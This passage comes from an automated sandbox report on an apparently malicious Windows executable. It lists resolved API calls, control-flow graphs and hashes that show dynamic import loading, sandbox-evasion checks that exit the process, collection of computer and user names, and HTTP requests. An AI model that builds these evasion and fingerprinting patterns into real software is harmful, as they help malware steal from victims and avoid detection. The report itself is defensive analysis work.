                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 107969558471db31557efd2d9535b1699180b21e2451a27af26b4cf9adf5a104
                                • Instruction ID: 87e5a232e933cafec8a5bee88cf8b7012b76954818e2e5f6d3007078f52df065
                                • Opcode Fuzzy Hash: 107969558471db31557efd2d9535b1699180b21e2451a27af26b4cf9adf5a104
                                • Instruction Fuzzy Hash: CE528031A116169FCB21EFA4CC89A9EB7B9EF45310F098024F919F7252DB70ED469B90

                                Control-flow Graph

                                APIs
                                • GetProcAddress.KERNEL32(77190000,017915A0), ref: 00C963E9
                                • GetProcAddress.KERNEL32(77190000,01791588), ref: 00C96402
                                • GetProcAddress.KERNEL32(77190000,01791798), ref: 00C9641A
                                • GetProcAddress.KERNEL32(77190000,017915D0), ref: 00C96432
                                • GetProcAddress.KERNEL32(77190000,01798C48), ref: 00C9644B
                                • GetProcAddress.KERNEL32(77190000,017856E8), ref: 00C96463
                                • GetProcAddress.KERNEL32(77190000,01785528), ref: 00C9647B
                                • GetProcAddress.KERNEL32(77190000,01791618), ref: 00C96494
                                • GetProcAddress.KERNEL32(77190000,017917B0), ref: 00C964AC
                                • GetProcAddress.KERNEL32(77190000,01791510), ref: 00C964C4
                                • GetProcAddress.KERNEL32(77190000,01791528), ref: 00C964DD
                                • GetProcAddress.KERNEL32(77190000,017856C8), ref: 00C964F5
                                • GetProcAddress.KERNEL32(77190000,01791540), ref: 00C9650D
                                • GetProcAddress.KERNEL32(77190000,01791558), ref: 00C96526
                                • GetProcAddress.KERNEL32(77190000,017855E8), ref: 00C9653E
                                • GetProcAddress.KERNEL32(77190000,01791570), ref: 00C96556
                                • GetProcAddress.KERNEL32(77190000,017915E8), ref: 00C9656F
                                • GetProcAddress.KERNEL32(77190000,01785588), ref: 00C96587
                                • GetProcAddress.KERNEL32(77190000,01791888), ref: 00C9659F
                                • GetProcAddress.KERNEL32(77190000,01785488), ref: 00C965B8
                                • LoadLibraryA.KERNEL32(01791870,?,?,?,00C91C03), ref: 00C965C9
                                • LoadLibraryA.KERNEL32(017918A0,?,?,?,00C91C03), ref: 00C965DB
                                • LoadLibraryA.KERNEL32(017918B8,?,?,?,00C91C03), ref: 00C965ED
                                • LoadLibraryA.KERNEL32(017917F8,?,?,?,00C91C03), ref: 00C965FE
                                • LoadLibraryA.KERNEL32(01791828,?,?,?,00C91C03), ref: 00C96610
                                • GetProcAddress.KERNEL32(76850000,01791858), ref: 00C9662D
                                • GetProcAddress.KERNEL32(77040000,01791810), ref: 00C96649
                                • GetProcAddress.KERNEL32(77040000,01791840), ref: 00C96661
                                • GetProcAddress.KERNEL32(75A10000,01798F48), ref: 00C9667D
                                • GetProcAddress.KERNEL32(75690000,01785708), ref: 00C96699
                                • GetProcAddress.KERNEL32(776F0000,01798BA8), ref: 00C966B5
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00C966CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 00C966C1
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: aa8c4556724577458f0874c37989adf4fb51e3ef9de7a13e98ec884d79e5f5ea
                                • Instruction ID: 64c5a7fb06681f83e3f44e92bc18be2645cb8fc7727798379d44685c199511c5
                                • Opcode Fuzzy Hash: aa8c4556724577458f0874c37989adf4fb51e3ef9de7a13e98ec884d79e5f5ea
                                • Instruction Fuzzy Hash: BBA177B9A11200DFD754DF67EE88A2637B9F78E7807108519E916E3362DB34B808DF60

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,017915A0), ref: 00C963E9
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791588), ref: 00C96402
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791798), ref: 00C9641A
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,017915D0), ref: 00C96432
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01798C48), ref: 00C9644B
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,017856E8), ref: 00C96463
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01785528), ref: 00C9647B
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791618), ref: 00C96494
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,017917B0), ref: 00C964AC
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791510), ref: 00C964C4
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791528), ref: 00C964DD
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,017856C8), ref: 00C964F5
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791540), ref: 00C9650D
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C91C2F
                                • ExitProcess.KERNEL32 ref: 00C91C67
                                • GetSystemInfo.KERNEL32(?), ref: 00C91C71
                                • ExitProcess.KERNEL32 ref: 00C91C7F
                                  • Part of subcall function 00C71030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C71046
                                  • Part of subcall function 00C71030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C7104D
                                  • Part of subcall function 00C71030: ExitProcess.KERNEL32 ref: 00C71058
                                  • Part of subcall function 00C710C0: GlobalMemoryStatusEx.KERNEL32 ref: 00C710EA
                                  • Part of subcall function 00C710C0: ExitProcess.KERNEL32 ref: 00C71114
                                • GetUserDefaultLangID.KERNEL32 ref: 00C91C8F
                                • ExitProcess.KERNEL32 ref: 00C91CB2
                                • ExitProcess.KERNEL32 ref: 00C91CE1
                                • lstrlen.KERNEL32(01798BF8), ref: 00C91CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C91D15
                                • lstrcat.KERNEL32(00000000,01798BF8), ref: 00C91D1D
                                • lstrlen.KERNEL32(00CA4B98), ref: 00C91D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91D48
                                • lstrcat.KERNEL32(00000000,00CA4B98), ref: 00C91D54
                                • lstrlen.KERNEL32(00000000), ref: 00C91D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91D94
                                • lstrlen.KERNEL32(00CA4B98), ref: 00C91D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91DBC
                                • lstrcat.KERNEL32(00000000,00CA4B98), ref: 00C91DC8
                                • lstrlen.KERNEL32(00000000), ref: 00C91DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91E04
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 8c7ee0c5b1697788abbff6ec8a6992366ddd79098237f89f30f99023ac27f139
                                • Instruction ID: 2c741889734defe8dc5f25bcc73c9729007637f2a4876339b029a33e4dbf4af5
                                • Opcode Fuzzy Hash: 8c7ee0c5b1697788abbff6ec8a6992366ddd79098237f89f30f99023ac27f139
                                • Instruction Fuzzy Hash: 1271D531601207AFDB21ABB1DD8EB6F36B9EF4A741F084024F916A6192DF30AD05DB60

                                Control-flow Graph

                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C76C6F
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C76CC2
                                • InternetOpenA.WININET(00C9CFEC,00000001,00000000,00000000,00000000), ref: 00C76CD5
                                • StrCmpCA.SHLWAPI(?,0179F498), ref: 00C76CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C76D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,0179EC60,00000000,00000000,-00400100,00000000), ref: 00C76D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00C76D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C76D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00C76DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C76DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C76E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00C76E7D
                                • InternetCloseHandle.WININET(00000000), ref: 00C76E8E
                                • InternetCloseHandle.WININET(?), ref: 00C76E98
                                • InternetCloseHandle.WININET(00000000), ref: 00C76EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C76EC3
                                Strings
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: df9eb207bd79831072cebdc23296a8ec070fa53b5093d28df9e4ba70281d15fd
                                • Instruction ID: b9888d7484da55944964d4129344a228b8628428a12a6bb3f505ab5ff524d1e5
                                • Opcode Fuzzy Hash: df9eb207bd79831072cebdc23296a8ec070fa53b5093d28df9e4ba70281d15fd
                                • Instruction Fuzzy Hash: 37819575A11615AFDB20DFA5DC49FAE77B8EF48700F148168F919F7281DB70AE048BA0

                                Control-flow Graph

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C74AA3
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00C74BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 6d9100d7969bc6e191ce731a90aa5fdfbb42beabc0c4bc7d0cb3a23b07881c8a
                                • Instruction ID: ec7072ae81b41b61512924e5ce1784e931b44d6593bd028a8f2503b559bb9485
                                • Opcode Fuzzy Hash: 6d9100d7969bc6e191ce731a90aa5fdfbb42beabc0c4bc7d0cb3a23b07881c8a
                                • Instruction Fuzzy Hash: 1631C518B8032E768628EBFF4C4BF5F6E7DDFC6B68B024066F50857180C9E15520CAA3

                                Control-flow Graph
                                • 2957 c92ad0-c92b22 GetProcessHeap RtlAllocateHeap GetComputerNameA
                                • 2958 c92b44-c92b59
                                • 2959 c92b24-c92b36
                                • Edges: 2957->2958, 2957->2959
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00C92AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C92B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00C92B1A
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 7f87aa21996c00e842a6161adf4ae5bf1ee5f7359453d5720b72ab2d09e3e9e0
                                • Instruction ID: c90e2f21df03605708e337550a5807f58f3044c95f4484047d50819140a53ffa
                                • Opcode Fuzzy Hash: 7f87aa21996c00e842a6161adf4ae5bf1ee5f7359453d5720b72ab2d09e3e9e0
                                • Instruction Fuzzy Hash: CC01D672A44608AFCB10CF99EC85B9EF7B8F749B61F00026AF919E3780D774690487A1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00C92A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C92A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00C92A8A
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 9859cf9baab24253bace5d4c80733b6f1e53a78735394bb12e15bcbfbcb7c129
                                • Instruction ID: ff0e13d72695251e6a82a6bbf12f7eebc925a4ef2f3558347074c5282b104bfc
                                • Opcode Fuzzy Hash: 9859cf9baab24253bace5d4c80733b6f1e53a78735394bb12e15bcbfbcb7c129
                                • Instruction Fuzzy Hash: 98F0B4B1A40208AFD700DF89DD49B9EBBBCF709B61F000226F915E3380D7B4290486E1

                                Control-flow Graph
                                • 633 c966e0-c966e7
                                • 634 c966ed-c96af9 GetProcAddress * 43
                                • 635 c96afe-c96b92 LoadLibraryA * 8
                                • 636 c96c08-c96c0f
                                • 637 c96b94-c96c03 GetProcAddress * 5
                                • 638 c96cd2-c96cd9
                                • 639 c96c15-c96ccd GetProcAddress * 8
                                • 640 c96cdb-c96d4a GetProcAddress * 5
                                • 641 c96d4f-c96d56
                                • 642 c96de9-c96df0
                                • 643 c96d5c-c96de4 GetProcAddress * 6
                                • 644 c96f10-c96f17
                                • 645 c96df6-c96f0b GetProcAddress * 12
                                • 646 c96f19-c96f88 GetProcAddress * 5
                                • 647 c96f8d-c96f94
                                • 648 c96fc1-c96fc8
                                • 649 c96f96-c96fbc GetProcAddress * 2
                                • 650 c96fca-c96ff0 GetProcAddress * 2
                                • 651 c96ff5-c96ffc
                                • 652 c970ed-c970f4
                                • 653 c97002-c970e8 GetProcAddress * 10
                                • 654 c97152-c97159
                                • 655 c970f6-c9714d GetProcAddress * 4
                                • 656 c9715b-c97169 GetProcAddress
                                • 657 c9716e-c97175
                                • 658 c971d3
                                • 659 c97177-c971ce GetProcAddress * 4
                                • Edges: 633->634, 633->635, 634->635, 635->636, 635->637, 636->638, 636->639, 637->636, 638->640, 638->641, 639->638, 640->641, 641->642, 641->643, 642->644, 642->645, 643->642, 644->646, 644->647, 645->644, 646->647, 647->648, 647->649, 648->650, 648->651, 649->648, 650->651, 651->652, 651->653, 652->654, 652->655, 653->652, 654->656, 654->657, 655->654, 656->657, 657->658, 657->659, 659->658
                                APIs
                                • GetProcAddress.KERNEL32(77190000,017853E8), ref: 00C966F5
                                • GetProcAddress.KERNEL32(77190000,017854C8), ref: 00C9670D
                                • GetProcAddress.KERNEL32(77190000,01799050), ref: 00C96726
                                • GetProcAddress.KERNEL32(77190000,01798FD8), ref: 00C9673E
                                • GetProcAddress.KERNEL32(77190000,01799008), ref: 00C96756
                                • GetProcAddress.KERNEL32(77190000,0179D220), ref: 00C9676F
                                • GetProcAddress.KERNEL32(77190000,0178A5A0), ref: 00C96787
                                • GetProcAddress.KERNEL32(77190000,0179D160), ref: 00C9679F
                                • GetProcAddress.KERNEL32(77190000,0179D250), ref: 00C967B8
                                • GetProcAddress.KERNEL32(77190000,0179D208), ref: 00C967D0
                                • GetProcAddress.KERNEL32(77190000,0179D2B0), ref: 00C967E8
                                • GetProcAddress.KERNEL32(77190000,01785568), ref: 00C96801
                                • GetProcAddress.KERNEL32(77190000,017855A8), ref: 00C96819
                                • GetProcAddress.KERNEL32(77190000,01785628), ref: 00C96831
                                • GetProcAddress.KERNEL32(77190000,01785648), ref: 00C9684A
                                • GetProcAddress.KERNEL32(77190000,0179D1A8), ref: 00C96862
                                • GetProcAddress.KERNEL32(77190000,0179D418), ref: 00C9687A
                                • GetProcAddress.KERNEL32(77190000,0178A910), ref: 00C96893
                                • GetProcAddress.KERNEL32(77190000,01785668), ref: 00C968AB
                                • GetProcAddress.KERNEL32(77190000,0179D268), ref: 00C968C3
                                • GetProcAddress.KERNEL32(77190000,0179D388), ref: 00C968DC
                                • GetProcAddress.KERNEL32(77190000,0179D358), ref: 00C968F4
                                • GetProcAddress.KERNEL32(77190000,0179D280), ref: 00C9690C
                                • GetProcAddress.KERNEL32(77190000,01785688), ref: 00C96925
                                • GetProcAddress.KERNEL32(77190000,0179D298), ref: 00C9693D
                                • GetProcAddress.KERNEL32(77190000,0179D238), ref: 00C96955
                                • GetProcAddress.KERNEL32(77190000,0179D2C8), ref: 00C9696E
                                • GetProcAddress.KERNEL32(77190000,0179D340), ref: 00C96986
                                • GetProcAddress.KERNEL32(77190000,0179D2E0), ref: 00C9699E
                                • GetProcAddress.KERNEL32(77190000,0179D370), ref: 00C969B7
                                • GetProcAddress.KERNEL32(77190000,0179D1C0), ref: 00C969CF
                                • GetProcAddress.KERNEL32(77190000,0179D3A0), ref: 00C969E7
                                • GetProcAddress.KERNEL32(77190000,0179D1D8), ref: 00C96A00
                                • GetProcAddress.KERNEL32(77190000,0178FE98), ref: 00C96A18
                                • GetProcAddress.KERNEL32(77190000,0179D430), ref: 00C96A30
                                • GetProcAddress.KERNEL32(77190000,0179D190), ref: 00C96A49
                                • GetProcAddress.KERNEL32(77190000,017856A8), ref: 00C96A61
                                • GetProcAddress.KERNEL32(77190000,0179D3B8), ref: 00C96A79
                                • GetProcAddress.KERNEL32(77190000,01785728), ref: 00C96A92
                                • GetProcAddress.KERNEL32(77190000,0179D2F8), ref: 00C96AAA
                                • GetProcAddress.KERNEL32(77190000,0179D1F0), ref: 00C96AC2
                                • GetProcAddress.KERNEL32(77190000,01785388), ref: 00C96ADB
                                • GetProcAddress.KERNEL32(77190000,017853A8), ref: 00C96AF3
                                • LoadLibraryA.KERNEL32(0179D310,00C9051F), ref: 00C96B05
                                • LoadLibraryA.KERNEL32(0179D328), ref: 00C96B16
                                • LoadLibraryA.KERNEL32(0179D3E8), ref: 00C96B28
                                • LoadLibraryA.KERNEL32(0179D3D0), ref: 00C96B3A
                                • LoadLibraryA.KERNEL32(0179D400), ref: 00C96B4B
                                • LoadLibraryA.KERNEL32(0179D148), ref: 00C96B5D
                                • LoadLibraryA.KERNEL32(0179D178), ref: 00C96B6F
                                • LoadLibraryA.KERNEL32(0179D490), ref: 00C96B80
                                • GetProcAddress.KERNEL32(77040000,01785288), ref: 00C96B9C
                                • GetProcAddress.KERNEL32(77040000,0179D610), ref: 00C96BB4
                                • GetProcAddress.KERNEL32(77040000,01798C18), ref: 00C96BCD
                                • GetProcAddress.KERNEL32(77040000,0179D550), ref: 00C96BE5
                                • GetProcAddress.KERNEL32(77040000,01785028), ref: 00C96BFD
                                • GetProcAddress.KERNEL32(73D20000,0178A4B0), ref: 00C96C1D
                                • GetProcAddress.KERNEL32(73D20000,01785068), ref: 00C96C35
                                • GetProcAddress.KERNEL32(73D20000,0178A4D8), ref: 00C96C4E
                                • GetProcAddress.KERNEL32(73D20000,0179D628), ref: 00C96C66
                                • GetProcAddress.KERNEL32(73D20000,0179D658), ref: 00C96C7E
                                • GetProcAddress.KERNEL32(73D20000,01785088), ref: 00C96C97
                                • GetProcAddress.KERNEL32(73D20000,01785048), ref: 00C96CAF
                                • GetProcAddress.KERNEL32(73D20000,0179D670), ref: 00C96CC7
                                • GetProcAddress.KERNEL32(768D0000,017850A8), ref: 00C96CE3
                                • GetProcAddress.KERNEL32(768D0000,017850C8), ref: 00C96CFB
                                • GetProcAddress.KERNEL32(768D0000,0179D6E8), ref: 00C96D14
                                • GetProcAddress.KERNEL32(768D0000,0179D700), ref: 00C96D2C
                                • GetProcAddress.KERNEL32(768D0000,01785148), ref: 00C96D44
                                • GetProcAddress.KERNEL32(75790000,0178A6B8), ref: 00C96D64
                                • GetProcAddress.KERNEL32(75790000,0178A500), ref: 00C96D7C
                                • GetProcAddress.KERNEL32(75790000,0179D598), ref: 00C96D95
                                • GetProcAddress.KERNEL32(75790000,01785128), ref: 00C96DAD
                                • GetProcAddress.KERNEL32(75790000,01785308), ref: 00C96DC5
                                • GetProcAddress.KERNEL32(75790000,0178A550), ref: 00C96DDE
                                • GetProcAddress.KERNEL32(75A10000,0179D640), ref: 00C96DFE
                                • GetProcAddress.KERNEL32(75A10000,01785228), ref: 00C96E16
                                • GetProcAddress.KERNEL32(75A10000,01798C08), ref: 00C96E2F
                                • GetProcAddress.KERNEL32(75A10000,0179D730), ref: 00C96E47
                                • GetProcAddress.KERNEL32(75A10000,0179D5E0), ref: 00C96E5F
                                • GetProcAddress.KERNEL32(75A10000,01785248), ref: 00C96E78
                                • GetProcAddress.KERNEL32(75A10000,017850E8), ref: 00C96E90
                                • GetProcAddress.KERNEL32(75A10000,0179D688), ref: 00C96EA8
                                • GetProcAddress.KERNEL32(75A10000,0179D6B8), ref: 00C96EC1
                                • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 00C96ED7
                                • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 00C96EEE
                                • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 00C96F05
                                • GetProcAddress.KERNEL32(76850000,017852A8), ref: 00C96F21
                                • GetProcAddress.KERNEL32(76850000,0179D6A0), ref: 00C96F39
                                • GetProcAddress.KERNEL32(76850000,0179D4C0), ref: 00C96F52
                                • GetProcAddress.KERNEL32(76850000,0179D568), ref: 00C96F6A
                                • GetProcAddress.KERNEL32(76850000,0179D6D0), ref: 00C96F82
                                • GetProcAddress.KERNEL32(75690000,01785328), ref: 00C96F9E
                                • GetProcAddress.KERNEL32(75690000,01785168), ref: 00C96FB6
                                • GetProcAddress.KERNEL32(769C0000,017852E8), ref: 00C96FD2
                                • GetProcAddress.KERNEL32(769C0000,0179D718), ref: 00C96FEA
                                • GetProcAddress.KERNEL32(6F8C0000,017851A8), ref: 00C9700A
                                • GetProcAddress.KERNEL32(6F8C0000,01785348), ref: 00C97022
                                • GetProcAddress.KERNEL32(6F8C0000,01785268), ref: 00C9703B
                                • GetProcAddress.KERNEL32(6F8C0000,0179D4A8), ref: 00C97053
                                • GetProcAddress.KERNEL32(6F8C0000,01785108), ref: 00C9706B
                                • GetProcAddress.KERNEL32(6F8C0000,01784F88), ref: 00C97084
                                • GetProcAddress.KERNEL32(6F8C0000,01785188), ref: 00C9709C
                                • GetProcAddress.KERNEL32(6F8C0000,01784FC8), ref: 00C970B4
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00C970CB
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00C970E2
                                • GetProcAddress.KERNEL32(75D90000,0179D448), ref: 00C970FE
                                • GetProcAddress.KERNEL32(75D90000,01798BD8), ref: 00C97116
                                • GetProcAddress.KERNEL32(75D90000,0179D4D8), ref: 00C9712F
                                • GetProcAddress.KERNEL32(75D90000,0179D460), ref: 00C97147
                                • GetProcAddress.KERNEL32(76470000,017851C8), ref: 00C97163
                                • GetProcAddress.KERNEL32(6EC00000,0179D478), ref: 00C9717F
                                • GetProcAddress.KERNEL32(6EC00000,017851E8), ref: 00C97197
                                • GetProcAddress.KERNEL32(6EC00000,0179D4F0), ref: 00C971B0
                                • GetProcAddress.KERNEL32(6EC00000,0179D508), ref: 00C971C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
